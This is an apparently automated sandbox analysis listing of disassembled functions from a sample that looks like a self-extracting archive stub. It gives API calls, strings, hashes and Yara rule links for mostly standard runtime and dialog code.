<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00899987

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 5198fb1fa042c53e5dc1eb527cadb21d6c5b1710bb847c93c94981a44396cc7f
Instruction ID: 88fbf34d6f46b83201030b4c2a15067bb34ccfbc22a8381950f8ee7889740ec7
Opcode Fuzzy Hash: 5198fb1fa042c53e5dc1eb527cadb21d6c5b1710bb847c93c94981a44396cc7f
Instruction Fuzzy Hash: 57318B3264431556EE34BB5C9C03B7A73E4FB91320F58841FF4C6D7280FAA4AD9083A2

Uniqueness

Uniqueness Score: -1.00%

Function 008AC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008AC868: _free.LIBCMT ref: 008AC891

_free.LIBCMT ref: 008AC8F2

Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4

_free.LIBCMT ref: 008AC8FD
_free.LIBCMT ref: 008AC908
_free.LIBCMT ref: 008AC95C
_free.LIBCMT ref: 008AC967
_free.LIBCMT ref: 008AC972
_free.LIBCMT ref: 008AC97D

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 6ac289a09407c778afec09ec23680d2eedb56ab7f7899baaea9457ec707636d9
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 0811FC71580B04EAF520BBB5CC06FCB7BECFF06B00F404825B3ADE6892DB69A5058752

Uniqueness

Uniqueness Score: -1.00%

Function 0089E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0089E669,0089E5CC,0089E86D), ref: 0089E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0089E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0089E630

Strings

AcquireSRWLockExclusive, xrefs: 0089E615
KERNEL32.DLL, xrefs: 0089E600
ReleaseSRWLockExclusive, xrefs: 0089E625

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 326d162b35bdcc48c1772b0fd96a6184d40fa1e886eca0581e546ec0ce0a4422
Instruction ID: d67d5dbf840ceb858b5cf808d2d7785a7930c6d108d663341d2f1bc911a4680b
Opcode Fuzzy Hash: 326d162b35bdcc48c1772b0fd96a6184d40fa1e886eca0581e546ec0ce0a4422
Instruction Fuzzy Hash: 44F0C2317806625B4F33FEA95C886BA2BC8FB357453180539E901D7200EB24CC55DA90

Uniqueness

Uniqueness Score: -1.00%

Function 0089146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 008914C2

Part of subcall function 0088B146: GetVersionExW.KERNEL32(?), ref: 0088B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008914E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00891500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00891513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00891523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00891533

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: c1a1d7f614d3e1976f281d39c1305b568991ebc1bbd462fbbc8356c35740820f
Instruction ID: 8a9559029baf86a63f0b8cbd173920c3cf9063a096f30c5688eaff2d43fe154f
Opcode Fuzzy Hash: c1a1d7f614d3e1976f281d39c1305b568991ebc1bbd462fbbc8356c35740820f
Instruction Fuzzy Hash: 5B31D775108346ABC704DFA8C88499BB7ECFF98754F044A1EF995C3210E730D549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 008A2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008A2AF1,008A02FC,0089FA34), ref: 008A2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008A2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A2B2F
SetLastError.KERNEL32(00000000,008A2AF1,008A02FC,0089FA34), ref: 008A2B81

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: c5ee739a8f379c15e4842cf244151349d115fa3e8ad5e510b7d54886722a194c
Instruction ID: 7ee7cf312cc0556ef2f6e5120430470f2fca0e7bfe648e18d57a177e4a297c55
Opcode Fuzzy Hash: c5ee739a8f379c15e4842cf244151349d115fa3e8ad5e510b7d54886722a194c
Instruction Fuzzy Hash: 5301B172109719AFB6342B7C6C85A662B59FF037747604739F511E5CE0EE114C029268

Uniqueness

Uniqueness Score: -1.00%

Function 008A97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,008C1030,008A4674,008C1030,?,?,008A3F73,00000050,?,008C1030,00000200), ref: 008A97E9
_free.LIBCMT ref: 008A981C
_free.LIBCMT ref: 008A9844
SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A9851
SetLastError.KERNEL32(00000000,?,008C1030,00000200), ref: 008A985D
_abort.LIBCMT ref: 008A9863

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: cbda639828d0f085633221932efd59c5cd1b67ab82096cd8e44cae75ca4afc3a
Instruction ID: f1cef9b47ba1d46d1f0c99f66e9644016afa6d3e95aeab3d09f6dc007c3de149
Opcode Fuzzy Hash: cbda639828d0f085633221932efd59c5cd1b67ab82096cd8e44cae75ca4afc3a
Instruction Fuzzy Hash: BEF0A435148A0566F71233386C0AA5B2B69FFD3B61F240234F664D2DA2FF2888028566

Uniqueness

Uniqueness Score: -1.00%

Function 0089DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0089DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089DC72
TranslateMessage.USER32(?), ref: 0089DC7C
DispatchMessageW.USER32(?), ref: 0089DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0089DC91

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: f4b96311d97b5f39e650b943a12eccf8536665fb04196fad67d85f37df848ec2
Instruction ID: 55a6828971d18251f8df7c8679aefc673971eadfe81a69c002cc005ea95796f8
Opcode Fuzzy Hash: f4b96311d97b5f39e650b943a12eccf8536665fb04196fad67d85f37df848ec2
Instruction Fuzzy Hash: 25F03C72A01229BBCF20ABA5DC4CDDB7F6DFF41791B044111F50AD6050D6749A46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0088C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0

Part of subcall function 0088B92D: _wcsrchr.LIBVCRUNTIME ref: 0088B944

_wcslen.LIBCMT ref: 0088C197
_wcslen.LIBCMT ref: 0088C1DF

Strings

.exe, xrefs: 0088C10B
.rar, xrefs: 0088C0E1, 0088C134
.sfx, xrefs: 0088C11A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: fd84939b379ba7ddf75dd9ecfdbfd0f896032606682927aa3ea96439e37551c3
Instruction ID: 9fa9ad3eb207b9f33b4fe77f12a5170af6caf65092c897021e04b1eee728dc37
Opcode Fuzzy Hash: fd84939b379ba7ddf75dd9ecfdbfd0f896032606682927aa3ea96439e37551c3
Instruction Fuzzy Hash: 2A41572655071599CB32BF788846A7BB3A8FF41744F14090EF892EB1C6EB704D81C3B2

Uniqueness

Uniqueness Score: -1.00%

Function 0089CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0089CE9D

Part of subcall function 0088B690: _wcslen.LIBCMT ref: 0088B696

_swprintf.LIBCMT ref: 0089CED1

Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5

SetDlgItemTextW.USER32(?,00000066,008C946A), ref: 0089CEF1
EndDialog.USER32(?,00000001), ref: 0089CFFE

Strings

%s%s%u, xrefs: 0089CEC6

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 57b4d7bc58661e72f5f7e171f03ae9b2de8f310d4bdc8cd28f3c43a581e12dd5
Instruction ID: acbbc7b6b900db803d1a9d8d603a0cfffc0e0c2466cf78e5f7fc14d17250a08f
Opcode Fuzzy Hash: 57b4d7bc58661e72f5f7e171f03ae9b2de8f310d4bdc8cd28f3c43a581e12dd5
Instruction Fuzzy Hash: 7441BFB1800658AADF25EBA4CC45EEE77BCFB05301F4480A6F90AE7141EF718A44CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0088BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0088BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0088A275,?,?,00000800,?,0088A23A,?,0088755C), ref: 0088BBC5
_wcslen.LIBCMT ref: 0088BC3B

Strings

UNC, xrefs: 0088BBA7
\\?\, xrefs: 0088BB52, 0088BB99, 0088BBF7, 0088BC4E

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 58b0d9bcfbab67140310a9a6143824b0b63a22755fecab84a8a38b5dcb17ecd7
Instruction ID: 91ff8af6b0e8401a1f708d2c1c198ff9be99b8233cc3f3077279760dc6dc5421
Opcode Fuzzy Hash: 58b0d9bcfbab67140310a9a6143824b0b63a22755fecab84a8a38b5dcb17ecd7
Instruction Fuzzy Hash: B741AE3144021AAADF21BF64CC01EEA77AAFF81390F144466F865E3251EB74EE908B61

Uniqueness

Uniqueness Score: -1.00%

Function 0089B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0089B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0089B712
DeleteObject.GDI32(00000000), ref: 0089B744
DeleteObject.GDI32(00000000), ref: 0089B767

Part of subcall function 0089A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0089B73D,00000066), ref: 0089A6D5
Part of subcall function 0089A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A6EC
Part of subcall function 0089A6C2: LoadResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A703
Part of subcall function 0089A6C2: LockResource.KERNEL32(00000000,?,?,?,0089B73D,00000066), ref: 0089A712
Part of subcall function 0089A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A72D
Part of subcall function 0089A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0089B73D,00000066), ref: 0089A73E
Part of subcall function 0089A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0089A7A7
Part of subcall function 0089A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0089A7C6
Part of subcall function 0089A6C2: GlobalFree.KERNEL32(00000000), ref: 0089A7CD

Strings

], xrefs: 0089B71A

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 5b10c39f4fb149f36497ace5617b46d8f4716d62780695cb6356fecb8801b6fb
Instruction ID: 29ab669a42fac498289cde23deeb5bbef0096bbe9c0128092523124da5c3ba90
Opcode Fuzzy Hash: 5b10c39f4fb149f36497ace5617b46d8f4716d62780695cb6356fecb8801b6fb
Instruction Fuzzy Hash: DB01A13650051577CF1277B86D89A7B7ABAFBC0B62F1D0110F900E7291DB218D0542A2

Uniqueness

Uniqueness Score: -1.00%

Function 0089D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370

EndDialog.USER32(?,00000001), ref: 0089D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0089D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0089D675
SetDlgItemTextW.USER32(?,00000068), ref: 0089D684

Strings

RENAMEDLG, xrefs: 0089D618

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 3cd800c7f4ae881a9c36ff76c12d9bf66e19a238ec3abf841dd4ffbf99c4b903
Instruction ID: 3b372c58768a1aecc9fe52f2543ace1f3d5b01c0d907b8a7f528b6706fc93deb
Opcode Fuzzy Hash: 3cd800c7f4ae881a9c36ff76c12d9bf66e19a238ec3abf841dd4ffbf99c4b903
Instruction Fuzzy Hash: B9014533245314BADA126F649D09F57775CFBAAB01F040011F302E6091C7A29A049BA9

Uniqueness

Uniqueness Score: -1.00%

Function 008A7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008A7E24,00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002), ref: 008A7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,008A7E24,00000000,?,008A7DC4,00000000,008BC300,0000000C,008A7F1B,00000000,00000002), ref: 008A7EC9

Strings

mscoree.dll, xrefs: 008A7E8C
CorExitProcess, xrefs: 008A7E9E

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b0311c574bf442a17911a3f8133534fec85e03a95d2687c47112b6b423385a3f
Instruction ID: 10396bd087268f9e8ea43bc7e65de5af1d79846572bfde94014ef9d0bdc09ee9
Opcode Fuzzy Hash: b0311c574bf442a17911a3f8133534fec85e03a95d2687c47112b6b423385a3f
Instruction Fuzzy Hash: 11F06231A00608BBDB15AFA4DC09BDEBFB5FF44716F0042A9F905E2260DB349E55DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0088F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0088F2E4
GetProcAddress.KERNEL32(008C81C8,CryptUnprotectMemory), ref: 0088F2F4

Strings

Crypt32.dll, xrefs: 0088F2CE
CryptUnprotectMemory, xrefs: 0088F2EA
CryptProtectMemory, xrefs: 0088F2DE

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: cad2eb94f72ee75c55bb494bdbdc741576eba864bfd3bfd8b19db3dba4948a25
Instruction ID: 6ef38eac7d06f4f5a640c923e358552d9b4b68b1fa0152d6c2f68a519ce3edb4
Opcode Fuzzy Hash: cad2eb94f72ee75c55bb494bdbdc741576eba864bfd3bfd8b19db3dba4948a25
Instruction Fuzzy Hash: A4E04F70950B119ECB21AB789C49B41BBD8FF04700F24892DE0EAE3741D6B8D5418B50

Uniqueness

Uniqueness Score: -1.00%

Function 008A2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 008A2CA1
___AdjustPointer.LIBCMT ref: 008A2CC4
_abort.LIBCMT ref: 008A2D12
___AdjustPointer.LIBCMT ref: 008A2D60

Memory Dump Source

Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
